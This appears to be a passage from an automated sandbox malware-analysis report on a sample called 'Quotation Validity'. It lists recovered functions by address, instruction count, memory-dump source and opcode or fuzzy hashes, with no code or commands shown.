                                                                                • Opcode Fuzzy Hash: 70acc11b02de32b3cc5dab0700437131bbd96fa371834dcd1945f53e5f1acc30
                                                                                • Instruction Fuzzy Hash: 30F024B1204241DBF320971D8C01B2236DEEBC065CF25D06AEB498F6C5EA70EC41C394
                                                                                Function 014453FC Relevance: .0, Instructions: 39COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 0e6e86b5b04be312e2fcbfc72fcfd44e91169ee1866e85a63a833733ecf78ab8
                                                                                • Instruction ID: 3da199ea277aee92abf575f1d69ecf2101fa0a460f860b386bd3173d5aae048f
                                                                                • Opcode Fuzzy Hash: 0e6e86b5b04be312e2fcbfc72fcfd44e91169ee1866e85a63a833733ecf78ab8
                                                                                • Instruction Fuzzy Hash: 1B011E70A0020ADFDB44DFA9D545B9EB7F4FF08304F148176E519EB391E6349A418B95
                                                                                Function 013A656A Relevance: .0, Instructions: 39COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: be77137e802a19fb0c687ceee00ad00c0fb17fd833a155bcee410af2920c45d3
                                                                                • Instruction ID: e0c1c5aa0fdb68c8722dbfa7b2304266f950fdefce63a2e7d32585956b90584b
                                                                                • Opcode Fuzzy Hash: be77137e802a19fb0c687ceee00ad00c0fb17fd833a155bcee410af2920c45d3
                                                                                • Instruction Fuzzy Hash: 390181B0204785DBE7229B2CCD49B2537E8EB54B4CF8C4190FA41DBAE6E768E4018610
                                                                                Function 0141437C Relevance: .0, Instructions: 37COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                • Instruction ID: e8219f4a2ca34696ed528a7b84e3f0994e70344a95bd056c076dd95cc33e6fe0
                                                                                • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                • Instruction Fuzzy Hash: 2EF0E931341A1347EB36AB2E9420B2BA6559F90B10B0D052F9605CB7A4DF30D8118780
                                                                                Function 0142F3E6 Relevance: .0, Instructions: 35COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 9a7e4ccbb7f348e8fc32fb023e965ff1800d4bddcdbe282a3e00465c149887a8
                                                                                • Instruction ID: 2576fca0ab6654c30f54348940319544bfeec61eec20ae459055f8fb3b143aeb
                                                                                • Opcode Fuzzy Hash: 9a7e4ccbb7f348e8fc32fb023e965ff1800d4bddcdbe282a3e00465c149887a8
                                                                                • Instruction Fuzzy Hash: A2F08C70A00209AFCB04EFA8D545A9EB7F4EF18304F80406AF905EB391E674EA41CB54
                                                                                Function 013692FF Relevance: .0, Instructions: 35COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: c86778b8b47c79a2c7536a567c2b67c250bb3068648320c625743768cc30ea4a
                                                                                • Instruction ID: 7a440faa97bbe18558aa70546367524277a2e05e65e51d2a8104b3b8874c8247
                                                                                • Opcode Fuzzy Hash: c86778b8b47c79a2c7536a567c2b67c250bb3068648320c625743768cc30ea4a
                                                                                • Instruction Fuzzy Hash: 1CF0FA32200340AFD732AB09CC04F9ABBFDEF84B08F28011DE542831A0CAB0E908C760
                                                                                Function 014455C9 Relevance: .0, Instructions: 35COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 4e19116961d1b9f92a7a2aac4f7bd34f252ab1d250cc325a48141b7f1aeefd62
                                                                                • Instruction ID: 451c09484b311ff1c8eb94954d34f8e2d399861ba9acabcb5dc4a6f02f09a8be
                                                                                • Opcode Fuzzy Hash: 4e19116961d1b9f92a7a2aac4f7bd34f252ab1d250cc325a48141b7f1aeefd62
                                                                                • Instruction Fuzzy Hash: 36F03C74A00249AFDB04EFA8D545A9EB7F4EF18704F10846AF909EB391E674EA00CB54
                                                                                Function 01430115 Relevance: .0, Instructions: 32COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d2d2536bbc93434ed097a520b3c7d18e073c656c8947e71c4da236f48d07b2d1
                                                                                • Instruction ID: f5227dd7af4c894473ed349aa7fb8c511c8639414ff83e996c7416ff4988d381
                                                                                • Opcode Fuzzy Hash: d2d2536bbc93434ed097a520b3c7d18e073c656c8947e71c4da236f48d07b2d1
                                                                                • Instruction Fuzzy Hash: 4AF027265156D016DF325F2C74502D22B64A79A418F5B114BDCA057339C5758887C325
                                                                                Function 0144539D Relevance: .0, Instructions: 31COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: fd837c8dbd22cfa3ea77f6950f0c28f4cd7d88b0d36fc8a855c917a08b4ae312
                                                                                • Instruction ID: 44f77d30ed248035d51f599b0ac1bdd98c1f8d1cee8fac0e6dbdad741df8ad1f
                                                                                • Opcode Fuzzy Hash: fd837c8dbd22cfa3ea77f6950f0c28f4cd7d88b0d36fc8a855c917a08b4ae312
                                                                                • Instruction Fuzzy Hash: 44F05470A1024DAFDB04EF79D545A9EB7B4EF14704F108055E602EB391EA74D9058B14
                                                                                Function 014452E2 Relevance: .0, Instructions: 31COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 6b01cc63a8865a0dd0156e06634f27c7a02c4e2a6caaa64ce9edea5bc10f8da8
                                                                                • Instruction ID: c3d88aea3849bf06e87611518bd2eeda67e0feae6716ad1aa5e31ec621a5426b
                                                                                • Opcode Fuzzy Hash: 6b01cc63a8865a0dd0156e06634f27c7a02c4e2a6caaa64ce9edea5bc10f8da8
                                                                                • Instruction Fuzzy Hash: 31F05E70A10249ABDB04EFB9E545EAEB7B4FF14708F444469A901EB391EA74E901CB54
                                                                                Function 01445283 Relevance: .0, Instructions: 31COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: f07a72b93f46305e1876f8435870862f9a1bcd1e90846721d56faed78348ad56
                                                                                • Instruction ID: 5ab6b3540fa3cb355136c86cf3a6883542cb92cf53d7363db5889e9be67f9160
                                                                                • Opcode Fuzzy Hash: f07a72b93f46305e1876f8435870862f9a1bcd1e90846721d56faed78348ad56
                                                                                • Instruction Fuzzy Hash: 79F05E70A10249ABDB04EFB9D545AAEB7F4FF14704F40446AB941EB391EA34E9018B54
                                                                                Function 013AC5ED Relevance: .0, Instructions: 31COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: fac13f6c1ae20f648288c19e5b5c05514dbdc321e513fe2fab4e880678ea09e5
                                                                                • Instruction ID: 50ec487af5a6e9d2936e7b5e86027c8950d48a0c3d31dcea1efca608d59f5db4
                                                                                • Opcode Fuzzy Hash: fac13f6c1ae20f648288c19e5b5c05514dbdc321e513fe2fab4e880678ea09e5
                                                                                • Instruction Fuzzy Hash: F6F0ECB19116959FE732DB1CC148B21BBE8EB047BCF9CB426D44687A32C264F880CA50
                                                                                Function 014451CB Relevance: .0, Instructions: 30COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: fbd14e106e2295ea14d50f6120de89007e8e571b2d5a1017211a230a63d347b1
                                                                                • Instruction ID: 4252f9cd7dc252f513069c1ea99b768926116eda17cdc92f524692c25d42beb7
                                                                                • Opcode Fuzzy Hash: fbd14e106e2295ea14d50f6120de89007e8e571b2d5a1017211a230a63d347b1
                                                                                • Instruction Fuzzy Hash: 87F08270A10249ABEB04EBB8D545EAE77B4FF04708F04005AFA01EB3D1EA74E901CB58
                                                                                Function 013ED070 Relevance: .0, Instructions: 30COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 29a6642c7ef7ed3592a36acdccc95c3bae471711bc0d42908ddba4b2807d0017
                                                                                • Instruction ID: e3e65a6852c80757874519f047fd4b05d2a254bb54c35d41af6956bcb85c9e20
                                                                                • Opcode Fuzzy Hash: 29a6642c7ef7ed3592a36acdccc95c3bae471711bc0d42908ddba4b2807d0017
                                                                                • Instruction Fuzzy Hash: 80F0E53350461467C230AA4D8C05F9BFBACDBE5B74F24031ABA249B2D0DA70EA01C7D6
                                                                                Function 01445341 Relevance: .0, Instructions: 30COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 736020ef762170849c6404e6c8213cff513be2487794f25ac7cda6edd3814d61
                                                                                • Instruction ID: 91e6d270a30a00c352e6aa3367ee22ecbc2f9a5b3ce864e2bd6b90f0a1a8a45f
                                                                                • Opcode Fuzzy Hash: 736020ef762170849c6404e6c8213cff513be2487794f25ac7cda6edd3814d61
                                                                                • Instruction Fuzzy Hash: F9F0A770A04249EBDF04EBBDD585E9E77F4EF19708F504059E502EB3E1EA74E9008718
                                                                                Function 013A7208 Relevance: .0, Instructions: 30COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: ba41ecaa4054052bf2cf149bcc7c6a72b6f9d1cd2ac1ffa27ae190c81ff2c64a
                                                                                • Instruction ID: b7d7ec022cd1eab147133524c70324676eb322eb04845481ab635b5de9de46c0
                                                                                • Opcode Fuzzy Hash: ba41ecaa4054052bf2cf149bcc7c6a72b6f9d1cd2ac1ffa27ae190c81ff2c64a
                                                                                • Instruction Fuzzy Hash: 21F08C719157A9DFEB22D71ED188B2277E89B48A78F198566D41ACB9D2C328D880C250
                                                                                Function 01445227 Relevance: .0, Instructions: 30COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 7a923abe502c5f4a6b8a06f16ce6e13939e04dedfc5d0e481b26412e58eb8473
                                                                                • Instruction ID: 8dcb2c417e7fac8893fa9058003285b643ee9b699a93a0ee9d8f35597645488f
                                                                                • Opcode Fuzzy Hash: 7a923abe502c5f4a6b8a06f16ce6e13939e04dedfc5d0e481b26412e58eb8473
                                                                                • Instruction Fuzzy Hash: 2FF08270A14249ABDB14EBB8D545EAE77B4FF14708F040059BA02EB391EA74D9018758
                                                                                Function 0144547F Relevance: .0, Instructions: 30COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 38670286c956f8eb74182b0f0a2543799c2e01fbd240342f01dd1b39d64249b2
                                                                                • Instruction ID: 67b282d61015d0b8455c44c50316ac0f16516a94c0be6b6b70fd155591f288b9
                                                                                • Opcode Fuzzy Hash: 38670286c956f8eb74182b0f0a2543799c2e01fbd240342f01dd1b39d64249b2
                                                                                • Instruction Fuzzy Hash: A1F08270B01249ABDB04EBB9D985F9E77B4EF08708F100065E602EF391EA34D901C758
                                                                                Function 013A55C0 Relevance: .0, Instructions: 28COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 09511f6a5b3cabbe784265c74914248b525a176bb6667c193042ebcc910e885d
                                                                                • Instruction ID: bda47ffa42871b6cc324a2a0844aa30e61625e5985c56d4d9603648bb29561de
                                                                                • Opcode Fuzzy Hash: 09511f6a5b3cabbe784265c74914248b525a176bb6667c193042ebcc910e885d
                                                                                • Instruction Fuzzy Hash: C6E0E533140614ABC6215A0AD804F12FB69FF60BB4F114215F599579908B60F811CAD4
                                                                                Function 013725E0 Relevance: .0, Instructions: 23COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 2289fc43ecc4c495ad1b226540be12ce4df8e2134baf23ee11ba9fa25a946f72
                                                                                • Instruction ID: 835369a6aae701867b161d783ec3257df0c58a2300d84a489cfc55b232d149be
                                                                                • Opcode Fuzzy Hash: 2289fc43ecc4c495ad1b226540be12ce4df8e2134baf23ee11ba9fa25a946f72
                                                                                • Instruction Fuzzy Hash: 2FE092721006549BC722FF2DDD01F8B77AAEB60768F114515F115571A0CA74BC10C784
                                                                                Function 013F4000 Relevance: .0, Instructions: 22COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                                • Instruction ID: 6df1f08b6f75df8d5b4d850785f9960eac44f8fa7a3d01d6446e6cc3d447e30b
                                                                                • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                                • Instruction Fuzzy Hash: 40E0C2343003068FE715CF19C040B63BBB6BFD5A14F28C078AA488F205EB32E842CB40
                                                                                Function 0142B3D0 Relevance: .0, Instructions: 21COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 2862d5c95079e8f9bdfc17701203be164f113e2c7109adcb0461f4fb661a1a8a
                                                                                • Instruction ID: 5b002f4d350e83387139e10cedac150a7a761ee06bd8c8bbceab5ed2af2375bb
                                                                                • Opcode Fuzzy Hash: 2862d5c95079e8f9bdfc17701203be164f113e2c7109adcb0461f4fb661a1a8a
                                                                                • Instruction Fuzzy Hash: CFE0CD31244615B7DB222A44CC00F657715DF50794F508032FA085A761C571EC91D6D4
                                                                                Function 0136823B Relevance: .0, Instructions: 21COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                                • Instruction ID: c0c6244af381c73e1f54af122b841f3ef4b782ae48bf28d3a098877f91d725b9
                                                                                • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                                • Instruction Fuzzy Hash: D1E0C231040B14EFDF326F19DC00F92B6A9FF6CF58F208969E181168A88BB0AC81CB54
                                                                                Function 01372050 Relevance: .0, Instructions: 20COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 414ccaa2788f001ef5ceead97064eecf16b104bd783eef53b6e2704fc6de6068
                                                                                • Instruction ID: 7ac4a6523dac1ebfb880335809d5587b57558aac72cff61898211f668d73664b
                                                                                • Opcode Fuzzy Hash: 414ccaa2788f001ef5ceead97064eecf16b104bd783eef53b6e2704fc6de6068
                                                                                • Instruction Fuzzy Hash: 16E0C232100650ABC721FF5DED00F4A73AEEFA5674F114121F154872A0CA68FC00C794
                                                                                Function 013F92BC Relevance: .0, Instructions: 20COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 57e44889305cf5d0cefc6e401db6fa834afdd5fd9089d2b50b803a3c8a5fbdd7
                                                                                • Instruction ID: ce4abcaf2fa3a72cc1011bde88a1b8e266c4aac5d92538d8b5a95c3865f3559d
                                                                                • Opcode Fuzzy Hash: 57e44889305cf5d0cefc6e401db6fa834afdd5fd9089d2b50b803a3c8a5fbdd7
                                                                                • Instruction Fuzzy Hash: CDF0C238251B84CFE62ADF08C1A1B5177B9FB45B48F510459E5868BBB1C73AA942CB40
                                                                                Function 0136B562 Relevance: .0, Instructions: 17COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 513c018af8093926a425ffcf59a89caa6ba2b1d98b48f3b0c5e1abf4a0335a68
                                                                                • Instruction ID: 92b2dc607e7c43142bfb0ba737e237156ddd336b016ef144cc6e6b6fbaba244a
                                                                                • Opcode Fuzzy Hash: 513c018af8093926a425ffcf59a89caa6ba2b1d98b48f3b0c5e1abf4a0335a68
                                                                                • Instruction Fuzzy Hash: F0D05B31161650EFD7317F19ED05F827AB5EF90F14F450525B141564F485A1DD44CA90
                                                                                Function 013AE59C Relevance: .0, Instructions: 16COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                                • Instruction ID: d6d9eb1199036822844c15160715a2757044d2c05d4de948fc64d61f4b948949
                                                                                • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                                • Instruction Fuzzy Hash: 66D0A932604620ABDB32AA1CFC04FC333E9BB88B28F160459B008C7290C360EC81CB84
                                                                                Function 0136A0E3 Relevance: .0, Instructions: 15COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                • Instruction ID: 7d0cc3f89548a6897272d672e23737a87ed19e462c803c66e7a451ed5b3f8fe9
                                                                                • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                • Instruction Fuzzy Hash: 57D0123221607197DF29675A6914F67795DAB81A9CF1A006DB90AA3904C5158C42D6E0
                                                                                Function 013802A0 Relevance: .0, Instructions: 13COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                • Instruction ID: 6ecefb84d56ce3e248c0e14b007b1cb82a0746af5deb4c0dfe6b29315ed439d8
                                                                                • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                • Instruction Fuzzy Hash: 02D0C935312E80CFDB1BCB0CC5A4B1533A8BB44B48F810490F401CBF62D67CD944CA00
                                                                                Function 013F930B Relevance: .0, Instructions: 12COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 73b68ca8792e09d39eb84bf204166a27678a7482029cab1375adc9e7cd32c121
                                                                                • Instruction ID: a40a50949c52329e231c3fe29f27fcece4e38c5c308fd9ed0297df05cd3d138c
                                                                                • Opcode Fuzzy Hash: 73b68ca8792e09d39eb84bf204166a27678a7482029cab1375adc9e7cd32c121
                                                                                • Instruction Fuzzy Hash: 77D01735941AC48FE72BCB08C165B507BF4F705B48F8910A9E1424BAA2C27C9984CB00
                                                                                Function 01390310 Relevance: .0, Instructions: 11COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                • Instruction ID: f6d8a059ef7475174c461f7d0565561fec4015fdbb01e384310e90b9de6644d6
                                                                                • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                • Instruction Fuzzy Hash: EDD01236100248EFCB05DF55C890D9A772EFBD8710F548019FD19076108A31ED62DA50
                                                                                Function 0139340D Relevance: .0, Instructions: 10COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 228d46562787cc6ef91b6aff40b17c30ce715ed8b58bcfbb69b93c396a4a2043
                                                                                • Instruction ID: 7d4402359ed6c3198fa8570d660a4566d52d6031a5a4f344d9f188cc32cb063f
                                                                                • Opcode Fuzzy Hash: 228d46562787cc6ef91b6aff40b17c30ce715ed8b58bcfbb69b93c396a4a2043
                                                                                • Instruction Fuzzy Hash: 0EC08CF81456816AEF2B6728C900B283A60BB00A0EF95019CAB40394A2C368DC028218
